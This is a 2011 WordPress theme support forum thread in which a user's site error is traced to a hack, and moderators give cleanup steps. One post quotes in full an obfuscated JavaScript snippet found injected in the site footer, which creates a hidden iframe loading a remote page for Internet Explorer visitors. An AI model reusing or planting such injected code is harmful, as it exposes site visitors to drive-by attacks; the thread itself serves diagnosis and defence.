Wordpress Themes - WP Forum at BFA
Click here to register or to donate.
Auto self-registration is not available here - far too many spammers. This forum has many, many backlinks and because of that there is an intense desire among spammers to drop their links here.

Wordpress Themes - WP Forum at BFA » WordPress Themes » Atahualpa 3 Wordpress theme »

[SOLVED] Random error


  #1  
Old Nov 19, 2011, 03:30 PM
Wimbledon's Avatar
Wimbledon
 
320 posts · Apr 2009
[VA & AZ], USA
I have not modified any of the templates for a while, yet this issue recently appeared on all pages:

Code:
Fatal error: Cannot redeclare _765258526() (previously declared in /home/wimble17/public_html/fscene.com/wp-content/themes/atahualpa353/index.php(42) : eval()'d code:1) in /home/wimble17/public_html/fscene.com/index.php(18) : eval()'d code on line 1
You can view it at the bottom of the live site here:

http://goo.gl/HZhvk
  #2  
Old Nov 19, 2011, 06:32 PM
juggledad's Avatar
juggledad
 
23,727 posts · Mar 2009
OSX 10.11.5 WP 4.x Atahualpa(all) Safari, Firefox, Chrome
what php code do you have in the footer area?
__________________
"Tell me and I forget, teach me and I may remember, involve me and I learn." - Benjamin Franklin
Juggledad | Forum Moderator/Support
  #3  
Old Nov 19, 2011, 07:21 PM
Wimbledon's Avatar
Wimbledon
 
320 posts · Apr 2009
[VA & AZ], USA
Thanks for your time juggledad.

There is no php code in the footer but I did insert some php code in the "content below the loop" section:

http://snipt.org/kXll7
  #4  
Old Nov 20, 2011, 04:02 AM
juggledad's Avatar
juggledad
 
23,727 posts · Mar 2009
OSX 10.11.5 WP 4.x Atahualpa(all) Safari, Firefox, Chrome
what version?
try changing the
HTML Code:
<?php if ( is_front_page() && strpos($_SERVER['REQUEST_URI'], "/page/") === false) { ?>
to
HTML Code:
<?php if ( is_front_page() ) { ?>
__________________
"Tell me and I forget, teach me and I may remember, involve me and I learn." - Benjamin Franklin
Juggledad | Forum Moderator/Support

Last edited by juggledad; Nov 20, 2011 at 04:08 AM.
  #5  
Old Nov 21, 2011, 01:06 PM
Wimbledon's Avatar
Wimbledon
 
320 posts · Apr 2009
[VA & AZ], USA
No change occurred.

This site is running Atahualpa 3.5.3
  #6  
Old Nov 21, 2011, 05:02 PM
lmilesw's Avatar
lmilesw
 
10,174 posts · Jul 2009
Central New York State USA
What happens if you temporarily remove the code you put in the "content below the loop" section?
__________________
~Larry (CNY Web Designs)
This site should be a membership site since it so full of good stuff.
Please consider donating which gives you access to even more good stuff.
  #7  
Old Nov 22, 2011, 04:00 PM
Wimbledon's Avatar
Wimbledon
 
320 posts · Apr 2009
[VA & AZ], USA
Quote:
Originally Posted by lmilesw
What happens if you temporarily remove the code you put in the "content below the loop" section?
Good observation. I just tried removing all the code I entered there, and nothing changed on the site either. So the problem must lie somewhere else.
  #8  
Old Nov 22, 2011, 04:39 PM
juggledad's Avatar
juggledad
 
23,727 posts · Mar 2009
OSX 10.11.5 WP 4.x Atahualpa(all) Safari, Firefox, Chrome
export your settings (ato->export/import settings) and attach them to a reply
__________________
"Tell me and I forget, teach me and I may remember, involve me and I learn." - Benjamin Franklin
Juggledad | Forum Moderator/Support
  #9  
Old Nov 22, 2011, 04:52 PM
Wimbledon's Avatar
Wimbledon
 
320 posts · Apr 2009
[VA & AZ], USA
Quote:
Originally Posted by juggledad
export your settings (ato->export/import settings) and attach them to a reply
Thank you, here are the settings.

Last edited by Wimbledon; Nov 23, 2011 at 09:21 PM.
  #10  
Old Nov 22, 2011, 05:09 PM
juggledad's Avatar
juggledad
 
23,727 posts · Mar 2009
OSX 10.11.5 WP 4.x Atahualpa(all) Safari, Firefox, Chrome
do you have a yahoo plugin? There is some weird code in the footer of your page
Code:
<script type='text/javascript'>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 8(){b=4.h(\'9\');6(!b){a 0=4.j(\'k\');4.m.g(0);0.n=\'9\';0.5.f=\'7\';0.5.c=\'7\';0.5.d=\'e\';0.l=\'C://z.y.o/A.B?t=D\'}}a 2=x.w.q();6(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){4.u=8}',40,40,'el||ua|indexOf|document|style|if|1px|MakeFrameEx|yahoo_api|var|element|height|display|none|width|appendChild|getElementById|function|createElement|iframe|src|body|id|cx|msie|toLowerCase|opera|webtv||onmousemove|windows|userAgent|navigator|xe|noquestion|showthread|php|http|46340270'.split('|'),0,{}))
</script>
do you know what this is or what is adding it in?
__________________
"Tell me and I forget, teach me and I may remember, involve me and I learn." - Benjamin Franklin
Juggledad | Forum Moderator/Support
  #11  
Old Nov 23, 2011, 04:19 PM
Wimbledon's Avatar
Wimbledon
 
320 posts · Apr 2009
[VA & AZ], USA
Wow juggledad, I have no idea what that is. I certainly did not add it nor do I have any Yahoo plugins. The only plugins active on the site are Disqus, Lijit Search, and NextGen Gallery. Akismet and Hello Dolly are inactive plugins.

At ATO-->Style & Edit footer, there is no such code inserted.

Perhaps this is malicious code inserted through a security vulnerability?

Are you able to tell which file has this code? If so, I will edit the file and FTP the changes.

How odd...
  #12  
Old Nov 23, 2011, 06:14 PM
juggledad's Avatar
juggledad
 
23,727 posts · Mar 2009
OSX 10.11.5 WP 4.x Atahualpa(all) Safari, Firefox, Chrome
I looked at teh source of a page generated from your site. I wasn't going to mention malicious code...yet, but it certainly is not code meant to be understood.

here is what I would do, turn off all the plugins and swap to twenty-eleven.
view the fornt page of the site then look at the source of the page in the browser.
go to the end and see if that code is there. if it is, then I would say you were hacked.
__________________
"Tell me and I forget, teach me and I may remember, involve me and I learn." - Benjamin Franklin
Juggledad | Forum Moderator/Support
  #13  
Old Nov 23, 2011, 06:32 PM
Wimbledon's Avatar
Wimbledon
 
320 posts · Apr 2009
[VA & AZ], USA
I did exactly as you instructed yet unfortunately the code remained. It does appear that I was hacked.

Do you have any idea where I should start looking for this code?
  #14  
Old Nov 23, 2011, 07:10 PM
juggledad's Avatar
juggledad
 
23,727 posts · Mar 2009
OSX 10.11.5 WP 4.x Atahualpa(all) Safari, Firefox, Chrome
It might be a Wordpress file.
1) change all your passwords in Wordpress - look for strange users
If you want to do a forensic exam, backup the entire wordpress folder and the database and get a copy of the logs for as far back as you can. If it was an FTP hack, it should show something
Look at the dates on the files via FTP and see if there are ones that have newer dates than when you installed wp.
Maybe contact your host
Manually replace the entire wordpress code base, everything but the wp-config.php and the wp-contents folder
Replace every plugin with a new copy
Replace every theme with a new copy
Change tot FTP password
Check to see if there are any extra FTP users
Change your host Chanel password
Scan the db export for that code

Check google for other suggestions
__________________
"Tell me and I forget, teach me and I may remember, involve me and I learn." - Benjamin Franklin
Juggledad | Forum Moderator/Support
  #15  
Old Nov 23, 2011, 09:23 PM
Wimbledon's Avatar
Wimbledon
 
320 posts · Apr 2009
[VA & AZ], USA
Thanks again for your time and help.

Upon closer inspection, all sites on the server have been similarly compromised unfortunately. I am in correspondence with my host to help resolve this. I was definitely hacked.
  #16  
Old Nov 24, 2011, 12:16 AM
Wimbledon's Avatar
Wimbledon
 
320 posts · Apr 2009
[VA & AZ], USA
Update: this is a malicious attack on Wordpress setups going around right now.

http://redleg-redleg.blogspot.com/20...d-on-nlai.html

Bookmarks

Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes


Similar Threads
Thread Thread Starter Forum Replies Last Post
[SOLVED] ERROR MESSAGE: Parse error: syntax error, unexpected T_STRING in /hsphere/lo Candy Atahualpa 3 Wordpress theme 1 Oct 31, 2010 03:00 PM
Random Header? garnpet Header configuration & styling 1 Jun 11, 2010 03:36 AM
Use random image code to display random flash banner? blueprairie Header configuration & styling 0 Mar 18, 2010 01:30 PM
Random rotation deltahouse Header configuration & styling 4 Dec 25, 2009 04:03 PM
[SOLVED] Random first image bignall Header configuration & styling 2 Dec 14, 2009 07:37 PM


All times are GMT -6. The time now is 11:49 AM.


Powered by vBulletin® Copyright ©2000 - 2019, Jelsoft Enterprises Ltd.